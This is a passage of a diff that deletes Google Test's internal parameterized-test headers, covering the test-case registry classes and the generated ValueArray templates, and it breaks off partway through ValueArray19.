-template <class TestCase>
-class ParameterizedTestCaseInfo : public ParameterizedTestCaseInfoBase {
- public:
-  // ParamType and GeneratorCreationFunc are private types but are required
-  // for declarations of public methods AddTestPattern() and
-  // AddTestCaseInstantiation().
-  typedef typename TestCase::ParamType ParamType;
-  // A function that returns an instance of appropriate generator type.
-  typedef ParamGenerator<ParamType>(GeneratorCreationFunc)();
-
-  explicit ParameterizedTestCaseInfo(const char* name)
-      : test_case_name_(name) {}
-
-  // Test case base name for display purposes.
-  virtual const string& GetTestCaseName() const { return test_case_name_; }
-  // Test case id to verify identity.
-  virtual TypeId GetTestCaseTypeId() const { return GetTypeId<TestCase>(); }
-  // TEST_P macro uses AddTestPattern() to record information
-  // about a single test in a LocalTestInfo structure.
-  // test_case_name is the base name of the test case (without invocation
-  // prefix). test_base_name is the name of an individual test without
-  // parameter index. For the test SequenceA/FooTest.DoBar/1 FooTest is
-  // test case base name and DoBar is test base name.
-  void AddTestPattern(const char* test_case_name,
-                      const char* test_base_name,
-                      TestMetaFactoryBase<ParamType>* meta_factory) {
-    tests_.push_back(linked_ptr<TestInfo>(new TestInfo(test_case_name,
-                                                       test_base_name,
-                                                       meta_factory)));
-  }
-  // INSTANTIATE_TEST_CASE_P macro uses AddGenerator() to record information
-  // about a generator.
-  int AddTestCaseInstantiation(const string& instantiation_name,
-                               GeneratorCreationFunc* func,
-                               const char* /* file */,
-                               int /* line */) {
-    instantiations_.push_back(::std::make_pair(instantiation_name, func));
-    return 0;  // Return value used only to run this method in namespace scope.
-  }
-  // UnitTest class invokes this method to register tests in this test case
-  // test cases right before running tests in RUN_ALL_TESTS macro.
-  // This method should not be called more then once on any single
-  // instance of a ParameterizedTestCaseInfoBase derived class.
-  // UnitTest has a guard to prevent from calling this method more then once.
-  virtual void RegisterTests() {
-    for (typename TestInfoContainer::iterator test_it = tests_.begin();
-         test_it != tests_.end(); ++test_it) {
-      linked_ptr<TestInfo> test_info = *test_it;
-      for (typename InstantiationContainer::iterator gen_it =
-               instantiations_.begin(); gen_it != instantiations_.end();
-               ++gen_it) {
-        const string& instantiation_name = gen_it->first;
-        ParamGenerator<ParamType> generator((*gen_it->second)());
-
-        string test_case_name;
-        if ( !instantiation_name.empty() )
-          test_case_name = instantiation_name + "/";
-        test_case_name += test_info->test_case_base_name;
-
-        int i = 0;
-        for (typename ParamGenerator<ParamType>::iterator param_it =
-                 generator.begin();
-             param_it != generator.end(); ++param_it, ++i) {
-          Message test_name_stream;
-          test_name_stream << test_info->test_base_name << "/" << i;
-          MakeAndRegisterTestInfo(
-              test_case_name.c_str(),
-              test_name_stream.GetString().c_str(),
-              NULL,  // No type parameter.
-              PrintToString(*param_it).c_str(),
-              GetTestCaseTypeId(),
-              TestCase::SetUpTestCase,
-              TestCase::TearDownTestCase,
-              test_info->test_meta_factory->CreateTestFactory(*param_it));
-        }  // for param_it
-      }  // for gen_it
-    }  // for test_it
-  }  // RegisterTests
-
- private:
-  // LocalTestInfo structure keeps information about a single test registered
-  // with TEST_P macro.
-  struct TestInfo {
-    TestInfo(const char* a_test_case_base_name,
-             const char* a_test_base_name,
-             TestMetaFactoryBase<ParamType>* a_test_meta_factory) :
-        test_case_base_name(a_test_case_base_name),
-        test_base_name(a_test_base_name),
-        test_meta_factory(a_test_meta_factory) {}
-
-    const string test_case_base_name;
-    const string test_base_name;
-    const scoped_ptr<TestMetaFactoryBase<ParamType> > test_meta_factory;
-  };
-  typedef ::std::vector<linked_ptr<TestInfo> > TestInfoContainer;
-  // Keeps pairs of <Instantiation name, Sequence generator creation function>
-  // received from INSTANTIATE_TEST_CASE_P macros.
-  typedef ::std::vector<std::pair<string, GeneratorCreationFunc*> >
-      InstantiationContainer;
-
-  const string test_case_name_;
-  TestInfoContainer tests_;
-  InstantiationContainer instantiations_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ParameterizedTestCaseInfo);
-};  // class ParameterizedTestCaseInfo
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// ParameterizedTestCaseRegistry contains a map of ParameterizedTestCaseInfoBase
-// classes accessed by test case names. TEST_P and INSTANTIATE_TEST_CASE_P
-// macros use it to locate their corresponding ParameterizedTestCaseInfo
-// descriptors.
-class ParameterizedTestCaseRegistry {
- public:
-  ParameterizedTestCaseRegistry() {}
-  ~ParameterizedTestCaseRegistry() {
-    for (TestCaseInfoContainer::iterator it = test_case_infos_.begin();
-         it != test_case_infos_.end(); ++it) {
-      delete *it;
-    }
-  }
-
-  // Looks up or creates and returns a structure containing information about
-  // tests and instantiations of a particular test case.
-  template <class TestCase>
-  ParameterizedTestCaseInfo<TestCase>* GetTestCasePatternHolder(
-      const char* test_case_name,
-      const char* file,
-      int line) {
-    ParameterizedTestCaseInfo<TestCase>* typed_test_info = NULL;
-    for (TestCaseInfoContainer::iterator it = test_case_infos_.begin();
-         it != test_case_infos_.end(); ++it) {
-      if ((*it)->GetTestCaseName() == test_case_name) {
-        if ((*it)->GetTestCaseTypeId() != GetTypeId<TestCase>()) {
-          // Complain about incorrect usage of Google Test facilities
-          // and terminate the program since we cannot guaranty correct
-          // test case setup and tear-down in this case.
-          ReportInvalidTestCaseType(test_case_name,  file, line);
-          posix::Abort();
-        } else {
-          // At this point we are sure that the object we found is of the same
-          // type we are looking for, so we downcast it to that type
-          // without further checks.
-          typed_test_info = CheckedDowncastToActualType<
-              ParameterizedTestCaseInfo<TestCase> >(*it);
-        }
-        break;
-      }
-    }
-    if (typed_test_info == NULL) {
-      typed_test_info = new ParameterizedTestCaseInfo<TestCase>(test_case_name);
-      test_case_infos_.push_back(typed_test_info);
-    }
-    return typed_test_info;
-  }
-  void RegisterTests() {
-    for (TestCaseInfoContainer::iterator it = test_case_infos_.begin();
-         it != test_case_infos_.end(); ++it) {
-      (*it)->RegisterTests();
-    }
-  }
-
- private:
-  typedef ::std::vector<ParameterizedTestCaseInfoBase*> TestCaseInfoContainer;
-
-  TestCaseInfoContainer test_case_infos_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ParameterizedTestCaseRegistry);
-};
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  //  GTEST_HAS_PARAM_TEST
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_PARAM_UTIL_H_
-// This file was GENERATED by command:
-//     pump.py gtest-param-util-generated.h.pump
-// DO NOT EDIT BY HAND!!!
-
-// Copyright 2008 Google Inc.
-// All Rights Reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: vladl@google.com (Vlad Losev)
-
-// Type and function utilities for implementing parameterized tests.
-// This file is generated by a SCRIPT.  DO NOT EDIT BY HAND!
-//
-// Currently Google Test supports at most 50 arguments in Values,
-// and at most 10 arguments in Combine. Please contact
-// googletestframework@googlegroups.com if you need more.
-// Please note that the number of arguments to Combine is limited
-// by the maximum arity of the implementation of tuple which is
-// currently set at 10.
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_PARAM_UTIL_GENERATED_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_PARAM_UTIL_GENERATED_H_
-
-// scripts/fuse_gtest.py depends on gtest's own header being #included
-// *unconditionally*.  Therefore these #includes cannot be moved
-// inside #if GTEST_HAS_PARAM_TEST.
-
-#if GTEST_HAS_PARAM_TEST
-
-namespace testing {
-
-// Forward declarations of ValuesIn(), which is implemented in
-// include/gtest/gtest-param-test.h.
-template <typename ForwardIterator>
-internal::ParamGenerator<
-  typename ::testing::internal::IteratorTraits<ForwardIterator>::value_type>
-ValuesIn(ForwardIterator begin, ForwardIterator end);
-
-template <typename T, size_t N>
-internal::ParamGenerator<T> ValuesIn(const T (&array)[N]);
-
-template <class Container>
-internal::ParamGenerator<typename Container::value_type> ValuesIn(
-    const Container& container);
-
-namespace internal {
-
-// Used in the Values() function to provide polymorphic capabilities.
-template <typename T1>
-class ValueArray1 {
- public:
-  explicit ValueArray1(T1 v1) : v1_(v1) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const { return ValuesIn(&v1_, &v1_ + 1); }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray1& other);
-
-  const T1 v1_;
-};
-
-template <typename T1, typename T2>
-class ValueArray2 {
- public:
-  ValueArray2(T1 v1, T2 v2) : v1_(v1), v2_(v2) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray2& other);
-
-  const T1 v1_;
-  const T2 v2_;
-};
-
-template <typename T1, typename T2, typename T3>
-class ValueArray3 {
- public:
-  ValueArray3(T1 v1, T2 v2, T3 v3) : v1_(v1), v2_(v2), v3_(v3) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray3& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4>
-class ValueArray4 {
- public:
-  ValueArray4(T1 v1, T2 v2, T3 v3, T4 v4) : v1_(v1), v2_(v2), v3_(v3),
-      v4_(v4) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray4& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5>
-class ValueArray5 {
- public:
-  ValueArray5(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5) : v1_(v1), v2_(v2), v3_(v3),
-      v4_(v4), v5_(v5) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray5& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6>
-class ValueArray6 {
- public:
-  ValueArray6(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6) : v1_(v1), v2_(v2),
-      v3_(v3), v4_(v4), v5_(v5), v6_(v6) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray6& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7>
-class ValueArray7 {
- public:
-  ValueArray7(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7) : v1_(v1),
-      v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray7& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8>
-class ValueArray8 {
- public:
-  ValueArray8(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7,
-      T8 v8) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray8& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9>
-class ValueArray9 {
- public:
-  ValueArray9(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8,
-      T9 v9) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray9& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10>
-class ValueArray10 {
- public:
-  ValueArray10(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray10& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11>
-class ValueArray11 {
- public:
-  ValueArray11(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6),
-      v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray11& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12>
-class ValueArray12 {
- public:
-  ValueArray12(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5),
-      v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray12& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13>
-class ValueArray13 {
- public:
-  ValueArray13(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13) : v1_(v1), v2_(v2), v3_(v3), v4_(v4),
-      v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11),
-      v12_(v12), v13_(v13) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray13& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14>
-class ValueArray14 {
- public:
-  ValueArray14(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14) : v1_(v1), v2_(v2), v3_(v3),
-      v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray14& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15>
-class ValueArray15 {
- public:
-  ValueArray15(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15) : v1_(v1), v2_(v2),
-      v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray15& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16>
-class ValueArray16 {
- public:
-  ValueArray16(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16) : v1_(v1),
-      v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9),
-      v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15),
-      v16_(v16) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray16& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17>
-class ValueArray17 {
- public:
-  ValueArray17(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16,
-      T17 v17) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray17& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18>
-class ValueArray18 {
- public:
-  ValueArray18(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17), v18_(v18) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray18& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19>
-class ValueArray19 {
- public:
-  ValueArray19(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6),
-      v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13),
-      v14_(v14), v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
